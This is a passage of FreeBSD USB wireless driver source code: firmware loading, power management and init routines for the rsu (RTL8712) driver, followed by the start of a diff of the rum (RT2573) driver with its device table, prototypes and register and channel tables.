~0x04); /* Enable AFE PLL macro block. */ reg = rsu_read_1(sc, R92S_AFE_PLL_CTRL); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x11); DELAY(500); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x51); DELAY(500); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x11); DELAY(500); /* Attach AFE PLL to MACTOP/BB. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL, rsu_read_1(sc, R92S_SYS_ISO_CTRL) & ~0x11); /* Switch to 40MHz clock. */ rsu_write_1(sc, R92S_SYS_CLKR, 0x00); /* Disable CPU clock and 80MHz SSC. */ rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) | 0xa0); /* Enable MAC clock. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) | R92S_MAC_CLK_EN | R92S_SYS_CLK_EN); rsu_write_1(sc, R92S_PMC_FSM, 0x02); /* Enable digital core and IOREG R/W. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x80); /* Switch the control path to firmware. */ reg = rsu_read_2(sc, R92S_SYS_CLKR); reg = (reg & ~R92S_SWHW_SEL) | R92S_FWHW_SEL; rsu_write_2(sc, R92S_SYS_CLKR, reg); rsu_write_2(sc, R92S_CR, 0x37fc); /* Fix USB RX FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) & ~R92S_SYS_CPU_CLKSEL); rsu_write_1(sc, 0xfe1c, 0x80); /* Make sure TxDMA is ready to download firmware. */ for (ntries = 0; ntries < 20; ntries++) { reg = rsu_read_1(sc, R92S_TCR); if ((reg & (R92S_TCR_IMEM_CHK_RPT | R92S_TCR_EMEM_CHK_RPT)) == (R92S_TCR_IMEM_CHK_RPT | R92S_TCR_EMEM_CHK_RPT)) break; DELAY(5); } if (ntries == 20) { DPRINTF("TxDMA is not ready\n"); /* Reset TxDMA. */ reg = rsu_read_1(sc, R92S_CR); rsu_write_1(sc, R92S_CR, reg & ~R92S_CR_TXDMA_EN); DELAY(2); rsu_write_1(sc, R92S_CR, reg | R92S_CR_TXDMA_EN); } } static void rsu_power_off(struct rsu_softc *sc) { /* Turn RF off. */ rsu_write_1(sc, R92S_RF_CTRL, 0x00); usb_pause_mtx(&sc->sc_mtx, 5); /* Turn MAC off. */ /* Switch control path. */ rsu_write_1(sc, R92S_SYS_CLKR + 1, 0x38); /* Reset MACTOP. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, 0x70); rsu_write_1(sc, R92S_PMC_FSM, 0x06); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 0, 0xf9); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, 0xe8); /* Disable AFE PLL. */ rsu_write_1(sc, R92S_AFE_PLL_CTRL, 0x00); /* Disable A15V. */ rsu_write_1(sc, R92S_LDOA15_CTRL, 0x54); /* Disable eFuse 1.2V. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, 0x50); rsu_write_1(sc, R92S_LDOV12D_CTRL, 0x24); /* Enable AFE macro block's bandgap and Mbias. */ rsu_write_1(sc, R92S_AFE_MISC, 0x30); /* Disable 1.6V LDO. */ rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x56); rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x43); } static int rsu_fw_loadsection(struct rsu_softc *sc, const uint8_t *buf, int len) { struct rsu_data *data; struct r92s_tx_desc *txd; int mlen; while (len > 0) { data = rsu_getbuf(sc); if (data == NULL) return (ENOMEM); txd = (struct r92s_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); if (len <= RSU_TXBUFSZ - sizeof(*txd)) { /* Last chunk. */ txd->txdw0 |= htole32(R92S_TXDW0_LINIP); mlen = len; } else mlen = RSU_TXBUFSZ - sizeof(*txd); txd->txdw0 |= htole32(SM(R92S_TXDW0_PKTLEN, mlen)); memcpy(&txd[1], buf, mlen); data->buflen = sizeof(*txd) + mlen; DPRINTF("starting transfer %p\n", data); STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); buf += mlen; len -= mlen; } usbd_transfer_start(sc->sc_xfer[RSU_BULK_TX_VO]); return (0); } static int rsu_load_firmware(struct rsu_softc *sc) { const struct r92s_fw_hdr *hdr; struct r92s_fw_priv *dmem; const uint8_t *imem, *emem; int imemsz, ememsz; const struct firmware *fw; size_t size; uint32_t reg; int ntries, error; RSU_UNLOCK(sc); /* Read firmware image from the filesystem. */ if ((fw = firmware_get("rsu-rtl8712fw")) == NULL) { device_printf(sc->sc_dev, "%s: failed load firmware of file rsu-rtl8712fw\n", __func__); RSU_LOCK(sc); return (ENXIO); } RSU_LOCK(sc); size = fw->datasize; if (size < sizeof(*hdr)) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } hdr = (const struct r92s_fw_hdr *)fw->data; if (hdr->signature != htole16(0x8712) && hdr->signature != htole16(0x8192)) { device_printf(sc->sc_dev, "invalid firmware signature 0x%x\n", le16toh(hdr->signature)); error = EINVAL; goto fail; } DPRINTF("FW V%d %02x-%02x %02x:%02x\n", le16toh(hdr->version), hdr->month, hdr->day, hdr->hour, hdr->minute); /* Make sure that driver and firmware are in sync. */ if (hdr->privsz != htole32(sizeof(*dmem))) { device_printf(sc->sc_dev, "unsupported firmware image\n"); error = EINVAL; goto fail; } /* Get FW sections sizes. */ imemsz = le32toh(hdr->imemsz); ememsz = le32toh(hdr->sramsz); /* Check that all FW sections fit in image. */ if (size < sizeof(*hdr) + imemsz + ememsz) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } imem = (const uint8_t *)&hdr[1]; emem = imem + imemsz; /* Load IMEM section. */ error = rsu_fw_loadsection(sc, imem, imemsz); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "IMEM"); goto fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 10; ntries++) { usb_pause_mtx(&sc->sc_mtx, 10); reg = rsu_read_2(sc, R92S_TCR); if (reg & R92S_TCR_IMEM_CODE_DONE) break; } if (ntries == 10 || !(reg & R92S_TCR_IMEM_CHK_RPT)) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "IMEM"); error = ETIMEDOUT; goto fail; } /* Load EMEM section. */ error = rsu_fw_loadsection(sc, emem, ememsz); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "EMEM"); goto fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 10; ntries++) { usb_pause_mtx(&sc->sc_mtx, 10); reg = rsu_read_2(sc, R92S_TCR); if (reg & R92S_TCR_EMEM_CODE_DONE) break; } if (ntries == 10 || !(reg & R92S_TCR_EMEM_CHK_RPT)) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "EMEM"); error = ETIMEDOUT; goto fail; } /* Enable CPU. */ rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) | R92S_SYS_CPU_CLKSEL); if (!(rsu_read_1(sc, R92S_SYS_CLKR) & R92S_SYS_CPU_CLKSEL)) { device_printf(sc->sc_dev, "could not enable system clock\n"); error = EIO; goto fail; } rsu_write_2(sc, R92S_SYS_FUNC_EN, rsu_read_2(sc, R92S_SYS_FUNC_EN) | R92S_FEN_CPUEN); if (!(rsu_read_2(sc, R92S_SYS_FUNC_EN) & R92S_FEN_CPUEN)) { device_printf(sc->sc_dev, "could not enable microcontroller\n"); error = EIO; goto fail; } /* Wait for CPU to initialize. */ for (ntries = 0; ntries < 100; ntries++) { if (rsu_read_2(sc, R92S_TCR) & R92S_TCR_IMEM_RDY) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for microcontroller\n"); error = ETIMEDOUT; goto fail; } /* Update DMEM section before loading. */ dmem = __DECONST(struct r92s_fw_priv *, &hdr->priv); memset(dmem, 0, sizeof(*dmem)); dmem->hci_sel = R92S_HCI_SEL_USB | R92S_HCI_SEL_8172; dmem->nendpoints = sc->npipes; dmem->rf_config = 0x12; /* 1T2R */ dmem->vcs_type = R92S_VCS_TYPE_AUTO; dmem->vcs_mode = R92S_VCS_MODE_RTS_CTS; #ifdef notyet dmem->bw40_en = (ic->ic_htcaps & IEEE80211_HTCAP_CBW20_40) != 0; #endif dmem->turbo_mode = 1; /* Load DMEM section. */ error = rsu_fw_loadsection(sc, (uint8_t *)dmem, sizeof(*dmem)); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "DMEM"); goto fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 100; ntries++) { if (rsu_read_2(sc, R92S_TCR) & R92S_TCR_DMEM_CODE_DONE) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "DMEM"); error = ETIMEDOUT; goto fail; } /* Wait for firmware readiness. */ for (ntries = 0; ntries < 60; ntries++) { if (!(rsu_read_2(sc, R92S_TCR) & R92S_TCR_FWRDY)) break; DELAY(1000); } if (ntries == 60) { device_printf(sc->sc_dev, "timeout waiting for firmware readiness\n"); error = ETIMEDOUT; goto fail; } fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int rsu_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rsu_softc *sc = ifp->if_softc; struct rsu_data *bf; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } RSU_LOCK(sc); bf = rsu_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); RSU_UNLOCK(sc); return (ENOBUFS); } ifp->if_opackets++; if (rsu_tx_start(sc, ni, m, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); RSU_UNLOCK(sc); return (EIO); } RSU_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void rsu_init(void *arg) { struct rsu_softc *sc = arg; RSU_LOCK(sc); rsu_init_locked(arg); RSU_UNLOCK(sc); } static void rsu_init_locked(struct rsu_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct r92s_set_pwr_mode cmd; int error; /* Init host async commands ring. */ sc->cmdq.cur = sc->cmdq.next = sc->cmdq.queued = 0; /* Allocate Tx/Rx buffers. */ error = rsu_alloc_rx_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx buffers\n"); return; } error = rsu_alloc_tx_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx buffers\n"); rsu_free_rx_list(sc); return; } /* Power on adapter. */ if (sc->cut == 1) rsu_power_on_acut(sc); else rsu_power_on_bcut(sc); /* Load firmware. */ error = rsu_load_firmware(sc); if (error != 0) goto fail; /* Enable Rx TCP checksum offload. */ rsu_write_4(sc, R92S_RCR, rsu_read_4(sc, R92S_RCR) | 0x04000000); /* Append PHY status. */ rsu_write_4(sc, R92S_RCR, rsu_read_4(sc, R92S_RCR) | 0x02000000); rsu_write_4(sc, R92S_CR, rsu_read_4(sc, R92S_CR) & ~0xff000000); /* Use 128 bytes pages. */ rsu_write_1(sc, 0x00b5, rsu_read_1(sc, 0x00b5) | 0x01); /* Enable USB Rx aggregation. */ rsu_write_1(sc, 0x00bd, rsu_read_1(sc, 0x00bd) | 0x80); /* Set USB Rx aggregation threshold. */ rsu_write_1(sc, 0x00d9, 0x01); /* Set USB Rx aggregation timeout (1.7ms/4). */ rsu_write_1(sc, 0xfe5b, 0x04); /* Fix USB Rx FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); /* Set MAC address. */ rsu_write_region_1(sc, R92S_MACID, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* NB: it really takes that long for firmware to boot. */ usb_pause_mtx(&sc->sc_mtx, 1500); DPRINTF("setting MAC address to %s\n", ether_sprintf(IF_LLADDR(ifp))); error = rsu_fw_cmd(sc, R92S_CMD_SET_MAC_ADDRESS, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); if (error != 0) { device_printf(sc->sc_dev, "could not set MAC address\n"); goto fail; } rsu_write_1(sc, R92S_USB_HRPWM, R92S_USB_HRPWM_PS_ST_ACTIVE | R92S_USB_HRPWM_PS_ALL_ON); memset(&cmd, 0, sizeof(cmd)); cmd.mode = R92S_PS_MODE_ACTIVE; DPRINTF("setting ps mode to %d\n", cmd.mode); error = rsu_fw_cmd(sc, R92S_CMD_SET_PWR_MODE, &cmd, sizeof(cmd)); if (error != 0) { device_printf(sc->sc_dev, "could not set PS mode\n"); goto fail; } #if 0 if (ic->ic_htcaps & IEEE80211_HTCAP_CBW20_40) { /* Enable 40MHz mode. */ error = rsu_fw_iocmd(sc, SM(R92S_IOCMD_CLASS, 0xf4) | SM(R92S_IOCMD_INDEX, 0x00) | SM(R92S_IOCMD_VALUE, 0x0007)); if (error != 0) { device_printf(sc->sc_dev, "could not enable 40MHz mode\n"); goto fail; } } /* Set default channel. */ ic->ic_bss->ni_chan = ic->ic_ibss_chan; #endif sc->scan_pass = 0; usbd_transfer_start(sc->sc_xfer[RSU_BULK_RX]); /* We're ready to go. */ ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); return; fail: rsu_free_rx_list(sc); rsu_free_tx_list(sc); return; } static void rsu_stop(struct ifnet *ifp, int disable) { struct rsu_softc *sc = ifp->if_softc; RSU_LOCK(sc); rsu_stop_locked(ifp, disable); RSU_UNLOCK(sc); } static void rsu_stop_locked(struct ifnet *ifp, int disable __unused) { struct rsu_softc *sc = ifp->if_softc; int i; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); callout_stop(&sc->sc_watchdog_ch); sc->sc_calibrating = 0; taskqueue_cancel_timeout(taskqueue_thread, &sc->calib_task, NULL); /* Power off adapter. */ rsu_power_off(sc); for (i = 0; i < RSU_N_TRANSFER; i++) usbd_transfer_stop(sc->sc_xfer[i]); } diff --git a/sys/dev/usb/wlan/if_rum.c b/sys/dev/usb/wlan/if_rum.c index e05dda07711d..1b45c35a4e17 100644 --- a/sys/dev/usb/wlan/if_rum.c +++ b/sys/dev/usb/wlan/if_rum.c @@ -1,2400 +1,2400 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005-2007 Damien Bergamini * Copyright (c) 2006 Niall O'Higgins * Copyright (c) 2007-2008 Hans Petter Selasky * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2501USB/RT2601USB chipset driver * http://www.ralinktech.com.tw/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR rum_debug #include #include #include #include #ifdef USB_DEBUG static int rum_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, rum, CTLFLAG_RW, 0, "USB rum"); SYSCTL_INT(_hw_usb_rum, OID_AUTO, debug, CTLFLAG_RW, &rum_debug, 0, "Debug level"); #endif #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) static const STRUCT_USB_HOST_ID rum_devs[] = { #define RUM_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } RUM_DEV(ABOCOM, HWU54DM), RUM_DEV(ABOCOM, RT2573_2), RUM_DEV(ABOCOM, RT2573_3), RUM_DEV(ABOCOM, RT2573_4), RUM_DEV(ABOCOM, WUG2700), RUM_DEV(AMIT, CGWLUSB2GO), RUM_DEV(ASUS, RT2573_1), RUM_DEV(ASUS, RT2573_2), RUM_DEV(BELKIN, F5D7050A), RUM_DEV(BELKIN, F5D9050V3), RUM_DEV(CISCOLINKSYS, WUSB54GC), RUM_DEV(CISCOLINKSYS, WUSB54GR), RUM_DEV(CONCEPTRONIC2, C54RU2), RUM_DEV(COREGA, CGWLUSB2GL), RUM_DEV(COREGA, CGWLUSB2GPX), RUM_DEV(DICKSMITH, CWD854F), RUM_DEV(DICKSMITH, RT2573), RUM_DEV(EDIMAX, EW7318USG), RUM_DEV(DLINK2, DWLG122C1), RUM_DEV(DLINK2, WUA1340), RUM_DEV(DLINK2, DWA111), RUM_DEV(DLINK2, DWA110), RUM_DEV(GIGABYTE, GNWB01GS), RUM_DEV(GIGABYTE, GNWI05GS), RUM_DEV(GIGASET, RT2573), RUM_DEV(GOODWAY, RT2573), RUM_DEV(GUILLEMOT, HWGUSB254LB), RUM_DEV(GUILLEMOT, HWGUSB254V2AP), RUM_DEV(HUAWEI3COM, WUB320G), RUM_DEV(MELCO, G54HP), RUM_DEV(MELCO, SG54HP), RUM_DEV(MELCO, SG54HG), RUM_DEV(MELCO, WLIUCG), RUM_DEV(MELCO, WLRUCG), RUM_DEV(MELCO, WLRUCGAOSS), RUM_DEV(MSI, RT2573_1), RUM_DEV(MSI, RT2573_2), RUM_DEV(MSI, RT2573_3), RUM_DEV(MSI, RT2573_4), RUM_DEV(NOVATECH, RT2573), RUM_DEV(PLANEX2, GWUS54HP), RUM_DEV(PLANEX2, GWUS54MINI2), RUM_DEV(PLANEX2, GWUSMM), RUM_DEV(QCOM, RT2573), RUM_DEV(QCOM, RT2573_2), RUM_DEV(QCOM, RT2573_3), RUM_DEV(RALINK, RT2573), RUM_DEV(RALINK, RT2573_2), RUM_DEV(RALINK, RT2671), RUM_DEV(SITECOMEU, WL113R2), RUM_DEV(SITECOMEU, WL172), RUM_DEV(SPARKLAN, RT2573), RUM_DEV(SURECOM, RT2573), #undef RUM_DEV }; static device_probe_t rum_match; static device_attach_t rum_attach; static device_detach_t rum_detach; static usb_callback_t rum_bulk_read_callback; static usb_callback_t rum_bulk_write_callback; static usb_error_t rum_do_request(struct rum_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *rum_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rum_vap_delete(struct ieee80211vap *); static void rum_tx_free(struct rum_tx_data *, int); static void rum_setup_tx_list(struct rum_softc *); static void rum_unsetup_tx_list(struct rum_softc *); static int rum_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void rum_setup_tx_desc(struct rum_softc *, struct rum_tx_desc *, uint32_t, uint16_t, int, int); static int rum_tx_mgt(struct rum_softc *, struct mbuf *, struct ieee80211_node *); static int rum_tx_raw(struct rum_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static int rum_tx_data(struct rum_softc *, struct mbuf *, struct ieee80211_node *); static void rum_start(struct ifnet *); static int rum_ioctl(struct ifnet *, u_long, caddr_t); static void rum_eeprom_read(struct rum_softc *, uint16_t, void *, int); static uint32_t rum_read(struct rum_softc *, uint16_t); static void rum_read_multi(struct rum_softc *, uint16_t, void *, int); static usb_error_t rum_write(struct rum_softc *, uint16_t, uint32_t); static usb_error_t rum_write_multi(struct rum_softc *, uint16_t, void *, size_t); static void rum_bbp_write(struct rum_softc *, uint8_t, uint8_t); static uint8_t rum_bbp_read(struct rum_softc *, uint8_t); static void rum_rf_write(struct rum_softc *, uint8_t, uint32_t); static void rum_select_antenna(struct rum_softc *); static void rum_enable_mrr(struct rum_softc *); static void rum_set_txpreamble(struct rum_softc *); static void rum_set_basicrates(struct rum_softc *); static void rum_select_band(struct rum_softc *, struct ieee80211_channel *); static void rum_set_chan(struct rum_softc *, struct ieee80211_channel *); static void rum_enable_tsf_sync(struct rum_softc *); static void rum_enable_tsf(struct rum_softc *); static void rum_update_slot(struct ifnet *); static void rum_set_bssid(struct rum_softc *, const uint8_t *); static void rum_set_macaddr(struct rum_softc *, const uint8_t *); static void rum_update_mcast(struct ifnet *); static void rum_update_promisc(struct ifnet *); static void rum_setpromisc(struct rum_softc *); static const char *rum_get_rf(int); static void rum_read_eeprom(struct rum_softc *); static int rum_bbp_init(struct rum_softc *); static void rum_init_locked(struct rum_softc *); static void rum_init(void *); static void rum_stop(struct rum_softc *); static void rum_load_microcode(struct rum_softc *, const uint8_t *, size_t); static void rum_prepare_beacon(struct rum_softc *, struct ieee80211vap *); static int rum_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rum_scan_start(struct ieee80211com *); static void rum_scan_end(struct ieee80211com *); static void rum_set_channel(struct ieee80211com *); static int rum_get_rssi(struct rum_softc *, uint8_t); static void rum_ratectl_start(struct rum_softc *, struct ieee80211_node *); static void rum_ratectl_timeout(void *); static void rum_ratectl_task(void *, int); static int rum_pause(struct rum_softc *, int); static const struct { uint32_t reg; uint32_t val; } rum_def_mac[] = { { RT2573_TXRX_CSR0, 0x025fb032 }, { RT2573_TXRX_CSR1, 0x9eaa9eaf }, { RT2573_TXRX_CSR2, 0x8a8b8c8d }, { RT2573_TXRX_CSR3, 0x00858687 }, { RT2573_TXRX_CSR7, 0x2e31353b }, { RT2573_TXRX_CSR8, 0x2a2a2a2c }, { RT2573_TXRX_CSR15, 0x0000000f }, { RT2573_MAC_CSR6, 0x00000fff }, { RT2573_MAC_CSR8, 0x016c030a }, { RT2573_MAC_CSR10, 0x00000718 }, { RT2573_MAC_CSR12, 0x00000004 }, { RT2573_MAC_CSR13, 0x00007f00 }, { RT2573_SEC_CSR0, 0x00000000 }, { RT2573_SEC_CSR1, 0x00000000 }, { RT2573_SEC_CSR5, 0x00000000 }, { RT2573_PHY_CSR1, 0x000023b0 }, { RT2573_PHY_CSR5, 0x00040a06 }, { RT2573_PHY_CSR6, 0x00080606 }, { RT2573_PHY_CSR7, 0x00000408 }, { RT2573_AIFSN_CSR, 0x00002273 }, { RT2573_CWMIN_CSR, 0x00002344 }, { RT2573_CWMAX_CSR, 0x000034aa } }; static const struct { uint8_t reg; uint8_t val; } rum_def_bbp[] = { { 3, 0x80 }, { 15, 0x30 }, { 17, 0x20 }, { 21, 0xc8 }, { 22, 0x38 }, { 23, 0x06 }, { 24, 0xfe }, { 25, 0x0a }, { 26, 0x0d }, { 32, 0x0b }, { 34, 0x12 }, { 37, 0x07 }, { 39, 0xf8 }, { 41, 0x60 }, { 53, 0x10 }, { 54, 0x18 }, { 60, 0x10 }, { 61, 0x04 }, { 62, 0x04 }, { 75, 0xfe }, { 86, 0xfe }, { 88, 0xfe }, { 90, 0x0f }, { 99, 0x00 }, { 102, 0x16 }, { 107, 0x04 } }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rum_rf5226[] = { { 1, 0x00b03, 0x001e1, 0x1a014, 0x30282 }, { 2, 0x00b03, 0x001e1, 0x1a014, 0x30287 }, { 3, 0x00b03, 0x001e2, 0x1a014, 0x30282 }, { 4, 0x00b03, 0x001e2, 0x1a014, 0x30287 }, { 5, 0x00b03, 0x001e3, 0x1a014, 0x30282 }, { 6, 0x00b03, 0x001e3, 0x1a014, 0x30287 }, { 7, 0x00b03, 0x001e4, 0x1a014, 0x30282 }, { 8, 0x00b03, 0x001e4, 0x1a014, 0x30287 }, { 9, 0x00b03, 0x001e5, 0x1a014, 0x30282 }, { 10, 0x00b03, 0x001e5, 0x1a014, 0x30287 }, { 11, 0x00b03, 0x001e6, 0x1a014, 0x30282 }, { 12, 0x00b03, 0x001e6, 0x1a014, 0x30287 }, { 13, 0x00b03, 0x001e7, 0x1a014, 0x30282 }, { 14, 0x00b03, 0x001e8, 0x1a014, 0x30284 }, { 34, 0x00b03, 0x20266, 0x36014, 0x30282 }, { 38, 0x00b03, 0x20267, 0x36014, 0x30284 }, { 42, 0x00b03, 0x20268, 0x36014, 0x30286 }, { 46, 0x00b03, 0x20269, 0x36014, 0x30288 }, { 36, 0x00b03, 0x00266, 0x26014, 0x30288 }, { 40, 0x00b03, 0x00268, 0x26014, 0x30280 }, { 44, 0x00b03, 0x00269, 0x26014, 0x30282 }, { 48, 0x00b03, 0x0026a, 0x26014, 0x30284 }, { 52, 0x00b03, 0x0026b, 0x26014, 0x30286 }, { 56, 0x00b03, 0x0026c, 0x26014, 0x30288 }, { 60, 0x00b03, 0x0026e, 0x26014, 0x30280 }, { 64, 0x00b03, 0x0026f, 0x26014, 0x30282 }, { 100, 0x00b03, 0x0028a, 0x2e014, 0x30280 }, { 104, 0x00b03, 0x0028b, 0x2e014, 0x30282 }, { 108, 0x00b03, 0x0028c, 0x2e014, 0x30284 }, { 112, 0x00b03, 0x0028d, 0x2e014, 0x30286 }, { 116, 0x00b03, 0x0028e, 0x2e014, 0x30288 }, { 120, 0x00b03, 0x002a0, 0x2e014, 0x30280 }, { 124, 0x00b03, 0x002a1, 0x2e014, 0x30282 }, { 128, 0x00b03, 0x002a2, 0x2e014, 0x30284 }, { 132, 0x00b03, 0x002a3, 0x2e014, 0x30286 }, { 136, 0x00b03, 0x002a4, 0x2e014, 0x30288 }, { 140, 0x00b03, 0x002a6, 0x2e014, 0x30280 }, { 149, 0x00b03, 0x002a8, 0x2e014, 0x30287 }, { 153, 0x00b03, 0x002a9, 0x2e014, 0x30289 }, { 157, 0x00b03, 0x002ab, 0x2e014, 0x30281 }, { 161, 0x00b03, 0x002ac, 0x2e014, 0x30283 }, { 165, 0x00b03, 0x002ad, 0x2e014, 0x30285 } }, rum_rf5225[] = { { 1, 0x00b33, 0x011e1, 0x1a014, 0x30282 }, { 2, 0x00b33, 0x011e1, 0x1a014, 0x30287 }, { 3, 0x00b33, 0x011e2, 0x1a014, 0x30282 }, { 4, 0x00b33, 0x011e2, 0x1a014, 0x30287 }, { 5, 0x00b33, 0x011e3, 0x1a014, 0x30282 }, { 6, 0x00b33, 0x011e3, 0x1a014, 0x30287 }, { 7, 0x00b33, 0x011e4, 0x1a014, 0x30282 }, { 8, 0x00b33, 0x011e4, 0x1a014, 0x30287 }, { 9, 0x00b33, 0x011e5, 0x1a014, 0x30282 }, { 10, 0x00b33, 0x011e5, 0x1a014, 0x30287 }, { 11, 0x00b33, 0x011e6, 0x1a014, 0x30282 }, { 12, 0x00b33, 0x011e6, 0x1a014, 0x30287 }, { 13, 0x00b33, 0x011e7, 0x1a014, 0x30282 }, { 14, 0x00b33, 0x011e8, 0x1a014, 0x30284 }, { 34, 0x00b33, 0x01266, 0x26014, 0x30282 }, { 38, 0x00b33, 0x01267, 0x26014, 0x30284 }, { 42, 0x00b33, 0x01268, 0x26014, 0x30286 }, { 46, 0x00b33, 0x01269, 0x26014, 0x30288 }, { 36, 0x00b33, 0x01266, 0x26014, 0x30288 }, { 40, 0x00b33, 0x01268, 0x26014, 0x30280 }, { 44, 0x00b33, 0x01269, 0x26014, 0x30282 }, { 48, 0x00b33, 0x0126a, 0x26014, 0x30284 }, { 52, 0x00b33, 0x0126b, 0x26014, 0x30286 }, { 56, 0x00b33, 0x0126c, 0x26014, 0x30288 }, { 60, 0x00b33, 0x0126e, 0x26014, 0x30280 }, { 64, 0x00b33, 0x0126f, 0x26014, 0x30282 }, { 100, 0x00b33, 0x0128a, 0x2e014, 0x30280 }, { 104, 0x00b33, 0x0128b, 0x2e014, 0x30282 }, { 108, 0x00b33, 0x0128c, 0x2e014, 0x30284 }, { 112, 0x00b33, 0x0128d, 0x2e014, 0x30286 }, { 116, 0x00b33, 0x0128e, 0x2e014, 0x30288 }, { 120, 0x00b33, 0x012a0, 0x2e014, 0x30280 }, { 124, 0x00b33, 0x012a1, 0x2e014, 0x30282 }, { 128, 0x00b33, 0x012a2, 0x2e014, 0x30284 }, { 132, 0x00b33, 0x012a3, 0x2e014, 0x30286 }, { 136, 0x00b33, 0x012a4, 0x2e014, 0x30288 }, { 140, 0x00b33, 0x012a6, 0x2e014, 0x30280 }, { 149, 0x00b33, 0x012a8, 0x2e014, 0x30287 }, { 153, 0x00b33, 0x012a9, 0x2e014, 0x30289 }, { 157, 0x00b33, 0x012ab, 0x2e014, 0x30281 }, { 161, 0x00b33, 0x012ac, 0x2e014, 0x30283 }, { 165, 0x00b33, 0x012ad, 0x2e014, 0x30285 } }; static const struct usb_config rum_config[RUM_N_TRANSFER] = { [RUM_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = (MCLBYTES + RT2573_TX_DESC_SIZE + 8), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = rum_bulk_write_callback, .timeout = 5000, /* ms */ }, [RUM_BULK_RD] = { .type = UE_BULK, 